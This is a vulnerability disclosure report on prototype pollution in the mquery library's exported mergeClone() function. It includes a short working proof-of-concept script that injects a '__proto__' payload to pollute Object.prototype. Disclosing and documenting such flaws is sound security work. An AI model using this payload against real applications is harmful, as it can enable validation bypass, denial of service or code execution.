Prototype Pollution in aheckmann/mquery

Valid

Reported on

Mar 17th 2021


✍️ Description

mquery is aware of the risk of prototype pollution in its exported functions cloneObject() and merge() and already guards them by checking each key against var specialProperties = ['__proto__', 'constructor', 'prototype']. However, the current protection does not cover another exported function, mergeClone(), which is also vulnerable to prototype pollution.

🕵️‍♂️ Proof of Concept

// PoC.js - the mquery version tested is 3.2.4
const mquery = require('mquery');
// JSON.parse creates an own "__proto__" key, which mergeClone() then walks into
var malicious_payload = '{"__proto__":{"polluted":"HACKED"}}';
console.log('Before:', {}.polluted); // undefined
mquery.utils.mergeClone({}, JSON.parse(malicious_payload));
console.log('After:', {}.polluted); // HACKED

💥 Impact

This vulnerability is capable of polluting Object's prototype and can lead to many kinds of attacks, such as denial of service, validation bypass, or potentially code execution.
